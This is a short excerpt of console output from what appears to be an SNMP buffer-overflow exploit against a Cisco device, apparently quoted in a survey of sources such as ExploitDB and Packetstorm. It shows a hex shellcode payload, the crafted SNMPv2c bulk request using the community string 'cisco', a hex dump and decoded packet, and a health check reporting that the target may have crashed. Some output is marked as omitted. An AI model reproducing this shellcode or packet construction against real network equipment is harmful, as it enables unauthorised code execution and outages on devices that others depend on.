 payload (133): eb14bf7082090931c9b104fcf3a4e92f0000005eebece8f8ffffff5531c089bfa5a5a5a5b8d8a5a5a531  
 EXBA msg (371): 3082016f0201010405636973636fa58201610204195985210201000201013082015130819106072b0601020101010  
 *** output omitted ****  
 [+] Connecting to  
 [+] packet 1 of 1  
 [+] 0000 30 82 01 6F 02 01 01 04 05 63 69 73 63 6F A5 82  
 [+] 0010 01 61 02 04 19 59 85 21 02 01 00 02 01 01 30 82 .a...Y.!......0.  
 [+] 0020 01 51 30 81 91 06 07 2B 06 01 02 01 01 01 04 81 .Q0....+........  
 [+] 0030 85 EB 14 BF 70 82 09 09 31 C9 B1 04 FC F3 A4 E9 ....p...1.......  
 [+] 0040 2F 00 00 00 5E EB EC E8 F8 FF FF FF 55 31 C0 89 /...^.......U1..  
 [+] 0050 BF A5 A5 A5 A5 B8 D8 A5 A5 A5 31 F8 BB A5 25 AC ..........1...%.  
 [+] 0060 AC 31 FB B9 A5 B5 A5 A5 31 F9 BA A0 A5 A5 A5 31 .1......1......1  
 [+] 0070 FA CD 80 EB 14 BF B0 60 06 08 31 C9 B1 04 FC F3 .......`..1.....  
 [+] 0080 A4 E9 2F 00 00 00 5E EB EC E8 F8 FF FF FF 55 89 ../...^.......U.  
 ###[ SNMP ]###  
 version = v2c  
 community = 'cisco'  
 \PDU \  
 |###[ SNMPbulk ]###  
 | id = <ASN1_INTEGER[425297185]>  
 | non_repeaters= 0  
 | max_repetitions= 1  
 | \varbindlist\  
 | |###[ SNMPvarbind ]###  
 | | oid = <ASN1_OID['.']>  
 | | value = <ASN1_STRING['\xeb\x14\xbfp\x82\t\t1\xc9\xb1\x04\xfc\xf3\xa4\xe9/\x00  
  *** output omitted ****  
 | |###[ SNMPvarbind ]###  
 | | oid = <ASN1_OID['.  
  *** output omitted ****']>  
 | | value = <ASN1_NULL[0]>  
 [-] timeout waiting for response - performing health check  
 [-] no response from health check - target may have crashed  
 [-] health check failed  


Most of the sources I've been using during that survey: Musalbas, Packetstom, ExploitDB, Cisco, Schneier